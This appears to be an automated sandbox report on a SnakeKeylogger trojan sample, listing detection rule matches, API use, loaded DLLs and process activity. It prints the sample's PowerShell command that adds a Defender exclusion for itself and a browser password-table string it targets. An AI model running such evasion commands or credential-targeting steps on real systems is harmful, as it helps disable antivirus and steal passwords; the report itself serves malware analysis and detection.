                Source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3GrfjMY0pG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, RYr6Dnb8cId14miXvc.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, RYr6Dnb8cId14miXvc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, RYr6Dnb8cId14miXvc.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, LnVnXikr7pD1OyDJ5H.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, LnVnXikr7pD1OyDJ5H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, RYr6Dnb8cId14miXvc.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, RYr6Dnb8cId14miXvc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, RYr6Dnb8cId14miXvc.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, LnVnXikr7pD1OyDJ5H.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, LnVnXikr7pD1OyDJ5H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, LnVnXikr7pD1OyDJ5H.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, LnVnXikr7pD1OyDJ5H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, RYr6Dnb8cId14miXvc.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, RYr6Dnb8cId14miXvc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, RYr6Dnb8cId14miXvc.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/11@3/4
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3GrfjMY0pG.exe.logJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ak33eccm.hcs.ps1Jump to behavior
                Source: 3GrfjMY0pG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 3GrfjMY0pG.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003328000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003337000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.000000000336B000.00000004.00000800.00020000.00000000.sdmp, 3GrfjMY0pG.exe, 00000005.00000002.3611341231.0000000003377000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 3GrfjMY0pG.exeVirustotal: Detection: 75%
                Source: 3GrfjMY0pG.exeReversingLabs: Detection: 71%
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile read: C:\Users\user\Desktop\3GrfjMY0pG.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\3GrfjMY0pG.exe "C:\Users\user\Desktop\3GrfjMY0pG.exe"
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess created: C:\Users\user\Desktop\3GrfjMY0pG.exe "C:\Users\user\Desktop\3GrfjMY0pG.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3GrfjMY0pG.exe"Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess created: C:\Users\user\Desktop\3GrfjMY0pG.exe "C:\Users\user\Desktop\3GrfjMY0pG.exe"Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
